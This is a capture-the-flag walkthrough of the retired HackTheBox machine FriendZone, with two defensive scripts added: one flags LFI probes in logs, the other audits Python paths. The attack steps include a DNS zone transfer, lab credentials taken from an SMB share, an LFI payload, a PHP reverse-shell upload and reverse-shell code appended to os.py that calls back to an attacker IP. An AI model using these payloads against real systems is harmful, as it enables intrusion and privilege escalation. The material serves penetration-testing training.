FriendZone HackTheBox WalkThrough

This is a walkthrough of the FriendZone HackTheBox machine, the 25th machine in our OSCP-like HTB Boxes series. In this writeup I demonstrate step by step how I rooted the FriendZone machine. Before diving into the hacking part, a few words about the box: it is a Linux machine with IP address 10.10.10.123, rated easy by its maker.

Since this machine is retired, you will need a VIP subscription at hackthebox.eu to access it. First connect your Kali/Parrot machine to the HackTheBox VPN and confirm connectivity by pinging its IP 10.10.10.123. If all goes well, start hacking.

As usual I started by scanning the machine with Nmap. Scanning gives us an idea of how to proceed: it finds open and closed ports and tells us which services and versions are running on them. The result is given below:

Scanning

$ sudo nmap -sC -sV -sT -oA nmap/friendzone 10.10.10.123

Nmap found ports 21, 22, 53, 80, 139, 443 and 445 open: vsFTPd on port 21, OpenSSH on port 22, DNS on port 53, Apache2 on port 80, SMB on ports 139 and 445, and Apache2 over SSL on port 443. That is a lot of services to enumerate. We start by searching for exploits for each software version reported by Nmap. Searchsploit (an offline tool to query exploit-db.com) found no relevant exploit for any of them; perhaps all the software was up to date when the machine was released. We will have to find some other attack vector to get into the machine.

Since port 21 is open, anonymous login is the first thing to check whenever you scan a machine. I tried logging in with anonymous:anonymous, but anonymous login is not allowed. On port 22 we will test SSH login once we get some credentials. Since no credentials are available yet, I moved on to enumerating ports 80 and 443.

The URL http://10.10.10.123/ revealed an email address, [email protected]; the domain extracted from it is friendzoneportal.red. The Nmap ssl-cert script also revealed the domain friendzone.red. I also added friendzone.htb, which I habitually add for HTB boxes. If virtual host routing is enabled we may get a different website for each name. So we now have three domains; let us add them to the hosts file at /etc/hosts.

Host File after Modification

$ cat /etc/hosts

http://friendzone.red, http://friendzoneportal.red and http://friendzone.htb all serve the same pages as http://10.10.10.123. The https URLs differ, as given below.

https://friendzone.htb/ — Not found

https://friendzoneportal.red/ — Watching you image

https://friendzone.red/ — Ready to escape from FriendZone

We have a DNS service on port 53 and three virtual hosts, so let us check whether a DNS zone transfer to our local machine is possible. When I tried, the server allowed me to transfer the zone files.

Performing DNS Zone Transfer

$ dig @10.10.10.123 friendzoneportal.red axfr

$ dig @10.10.10.123 friendzone.red axfr

The DNS zone transfer revealed more hostnames: admin.friendzoneportal.red, files.friendzoneportal.red, imports.friendzoneportal.red, vpn.friendzoneportal.red, administrator1.friendzone.red, hr.friendzone.red and uploads.friendzone.red. That gives a total of 14 new URLs to check, 7 over http and 7 over https. Before accessing them, let us add them to /etc/hosts.

Host File after Modification

$ cat /etc/hosts

Enumeration on Port 80 & 443

All the http URLs serve the same page and many of the https URLs are dead. I have annotated each URL below.

http://admin.friendzoneportal.red — Same as initial home page

https://admin.friendzoneportal.red  — login-page

http://files.friendzoneportal.red  — Same as initial home page

https://files.friendzoneportal.red  — Not Found

http://imports.friendzoneportal.red  — Same as initial home page

https://imports.friendzoneportal.red  — Not Found

http://vpn.friendzoneportal.red  — Same as initial home page

https://vpn.friendzoneportal.red  — Not Found

http://administrator1.friendzone.red  — Same as initial home page

https://administrator1.friendzone.red  — Admin Login Page

http://hr.friendzone.red  — Same as initial home page

https://hr.friendzone.red  — Not Found

http://uploads.friendzone.red  — Same as initial home page

https://uploads.friendzone.red  — File Upload Options

The http URLs are useless for now because they all show the same page; we will come back to them if the https URLs yield nothing interesting. For now we will focus on https://admin.friendzoneportal.red and https://administrator1.friendzone.red, because they have login pages against which we can test a lot of vulnerabilities, and on https://uploads.friendzone.red for file upload testing. Moving on to https://admin.friendzoneportal.red first.

When I tried to log in with any credentials it gave the message “Admin page is not developed yet!!! check for another one”. This line hints that another admin login page exists.

At https://administrator1.friendzone.red I found another admin login page. I tried some basic injections, SQL among them, but nothing worked. It requires valid credentials, so we will return to this page once we have some.

For now let us go to https://uploads.friendzone.red to see what is present. File upload is allowed through it with no restriction; we can even upload a webshell. The problem is that we cannot access our uploaded files. For that we need a directory listing or an LFI-type vulnerability, and so far neither has turned up.

Enumeration on Port 445

We have port 445 open let us check whether null session is allowed or not.

$ smbmap -H 10.10.10.123 -R --depth 5

Null session is allowed and we have access to a file creds.txt inside the general share. Let us download it using smbclient.

$ smbclient //10.10.10.123/general

smb: \> get creds.txt

smb: \> exit

$ cat creds.txt

creds.txt contains the credentials of the user admin.

admin : WORKWORKHhallelujah@#

After logging in with these credentials at https://administrator1.friendzone.red/login.php, the page told me to visit /dashboard.php.

Going to https://administrator1.friendzone.red/dashboard.php listed some parameters: image_id=a.jpg&pagename=timestamp. Next I tried to reach my uploaded file using the timestamp I got after the successful upload, but it gave me an error.

After spending some more time enumerating this URL I found an LFI vulnerability. It can be confirmed with the URL https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login, which returns the source code of the login page base64-encoded.

$ echo -n "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" | base64 -d

After a lot of enumeration I still could not find my uploaded webshell. From the result of the earlier command $ smbmap -H 10.10.10.123 -R --depth 5, we know the Samba server files are stored under /etc/Files/ and that the anonymous user also has write permission on //10.10.10.123/Development.

According to that result, our file should be on disk at /etc/Files/Development/shell, but after uploading the shell to the Development share through smbclient it turned out to be accessible at /etc/Development/shell. The admin probably changed the default directory. The uploaded shell can be executed at the URL https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell (no .php extension is given, because the .php extension is dropped from all PHP file names passed via pagename).
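From the defender's side, the LFI probing described above leaves a clear trail in the web server's access log. The Python script below is an added example (not part of the original walkthrough) that flags requests to dashboard.php whose pagename value carries a PHP stream wrapper, an absolute path or a traversal sequence; the log lines are constructed, and only the script path and parameter name come from this box.

```python
# Added example (not from the walkthrough): flag LFI probes against dashboard.php
# in Apache access logs. The log lines below are constructed.
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined Log Format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')
# A page selector meant for local templates should never be a PHP stream wrapper.
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)  # php://, data://, expect://, ...


def classify(line):
    """Return the reasons a log line looks like an LFI probe (empty list if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/dashboard.php"):
        return []
    reasons = []
    for raw in parse_qs(url.query).get("pagename", []):
        value = unquote(raw)  # parse_qs decoded once; a second pass catches double-encoding
        if WRAPPER_RE.match(value):
            reasons.append("stream wrapper")
        if value.startswith("/"):
            reasons.append("absolute path")
        if ".." in value.replace("\\", "/").split("/"):
            reasons.append("traversal")
    return reasons


def scan(lines):
    """Return (client IP, reasons) for every suspicious line."""
    flagged = ((line.split(" ", 1)[0], classify(line)) for line in lines)
    return [(ip, reasons) for ip, reasons in flagged if reasons]


# Constructed sample log; 10.10.14.x are attacker-side addresses as used in this writeup.
SAMPLE_LOG = [
    '10.10.14.7 - - [01/Jan/2019:10:00:00 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 512',
    '10.10.14.7 - - [01/Jan/2019:10:00:05 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login HTTP/1.1" 200 2048',
    '10.10.14.7 - - [01/Jan/2019:10:00:09 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/test HTTP/1.1" 200 64',
    '10.10.14.9 - - [01/Jan/2019:10:01:00 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1200',
    '10.10.14.9 - - [01/Jan/2019:10:02:00 +0000] "GET /login.php HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The same three checks are the ones a fixed dashboard.php should enforce on pagename before including anything: reject wrappers, reject absolute paths and reject traversal, ideally by matching against an allowlist of page names.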

Testing For File Upload

Let us upload a simple php script to check whether we can execute it or not.

$ echo "<?php echo \"This is test php file\" ?>" > test.php

$ cat test.php

$ smbclient //10.10.10.123/Development

smb: \> put test.php

smb: \> exit

The uploaded file can be accessed at https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test

Getting User Shell

Now that we have confirmed the file upload vulnerability, let us upload our webshell to get a user shell on our Kali machine.

$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php

$ vi shell.php # change to your tun0 IP

$ cat shell.php | grep -A8 -i 10.10.14.12

$ smbclient //10.10.10.123/Development 

smb: \> put shell.php

smb: \> exit

Access this URL to execute the shell: https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test. But before accessing it, start a netcat listener in your terminal.

$ nc -nvlp 1234

$ whoami && id

We have got a user shell; let us upgrade it to a fully interactive Linux shell so that we can run more advanced commands through it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

After some enumeration I found the file mysql_data.conf, which contains the SSH credentials of the user friend. The file is in the directory /var/www/.

$ cat /var/www/mysql_data.conf

The credential is friend: Agpyu12!0.213$

Let us login to user friend and capture user flag.

SSH into User Friend

$ ssh friend@10.10.10.123

~Agpyu12!0.213$

$ whoami && id

Capture User Flag

$ cat user.txt

Privilege Escalation

To escalate privileges to root we first have to find a privilege escalation vector. You can run an enumeration script like LinPEAS or LinEnum to do this job, or enumerate manually. I tried LinPEAS but it could not find the PrivEsc vector, so I had to enumerate manually.

Finding PrivEsc Vector

After some enumeration I found the file reporter.py in the directory /opt/server_admin/.

$ cat /opt/server_admin/reporter.py

Meanwhile, I ran pspy (a process monitoring tool) to monitor processes on the remote machine. It reported that reporter.py is executed by root every 2 minutes. If we had write permission on this file we would definitely get a root shell, but a normal user has no write permission on it, as you can see in the screenshot.

One thing to note in the above script is that it imports the os module. If we have permission to insert our reverse shell code into os.py, that code will be executed with root privileges when reporter.py runs, and we will get a reverse shell on our netcat listener.

$ ls -la /opt/server_admin/reporter.py

Let us check the permission of os.py.

$ locate os.py

$ ls -la /usr/lib/python2.7/os.py

os.py is world-writable: root has given write permission to every other user. So we can have our reverse shell code executed by root by inserting it into os.py. When I did this I got a reverse shell with root privileges very easily. So our PrivEsc vector is Python library hijacking. For more info on Python library hijacking check this blog, and see another HTB box writeup with the same privilege escalation vector here.
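As an added example from the defender's side (not part of the original walkthrough), the Python script below audits an interpreter's module search path for exactly the weakness that made os.py hijackable here: search-path directories and module files that are not owned by root or are group/world-writable. It generalises the single os.py case to every directory a privileged script would import from.

```python
# Added example (not from the walkthrough): audit the Python module search path for
# files a non-root user could alter, which is what made /usr/lib/python2.7/os.py hijackable.
import os
import stat
import sys

GROUP_OR_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def is_hijackable(mode, uid):
    """True if a file or directory with this st_mode and owner uid could be altered by a non-root user."""
    return uid != 0 or bool(mode & GROUP_OR_OTHER_WRITE)


def audit_search_path(paths):
    """Return (path, octal permission bits, owner uid) for every weak search-path directory
    and every .py/.so module inside one. Directories matter too: a writable directory lets
    a user drop a shadowing os.py there even when the real os.py is safe."""
    findings = []
    for directory in paths:
        if not directory or not os.path.isdir(directory):
            continue  # '' and zip archives on sys.path are skipped here
        st = os.stat(directory)
        if is_hijackable(st.st_mode, st.st_uid):
            findings.append((directory, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
        try:
            entries = list(os.scandir(directory))
        except PermissionError:
            continue
        for entry in entries:
            if entry.name.endswith((".py", ".so")):
                st = entry.stat(follow_symlinks=True)
                if is_hijackable(st.st_mode, st.st_uid):
                    findings.append((entry.path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return findings


if __name__ == "__main__":
    # Audit this interpreter's own sys.path, or pass the search path of the interpreter the
    # root cron job uses (python2 on this box: python2 -c 'import sys; print(sys.path)').
    for path, mode, uid in audit_search_path(sys.argv[1:] or sys.path):
        print(f"{mode} uid={uid} {path}")
```

On a healthy system every line reported should be explainable; a stdlib file such as os.py with mode 0o666 or 0o777 is the finding that would have caught this box's PrivEsc vector before anyone exploited it.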

Getting Root Shell

To get a root shell, start a netcat listener in one window and append the following reverse shell code to os.py, changing the IP to yours, then save it. Wait up to 2 minutes for the shell.

import pty
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.7",9001))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()

$ nano /usr/lib/python2.7/os.py

$ tail -13 /usr/lib/python2.7/os.py

$ nc -nvlp 9001

# whoami && id

We have got root shell. Let us capture root flag.

Capture Root Flag

$ cat root.txt

This is how I rooted the FriendZone HackTheBox machine. I learnt a lot during this challenge and hope you have learnt something new too. Thanks for reading this walkthrough. For any query or suggestion about the writeup, feel free to write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter and CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/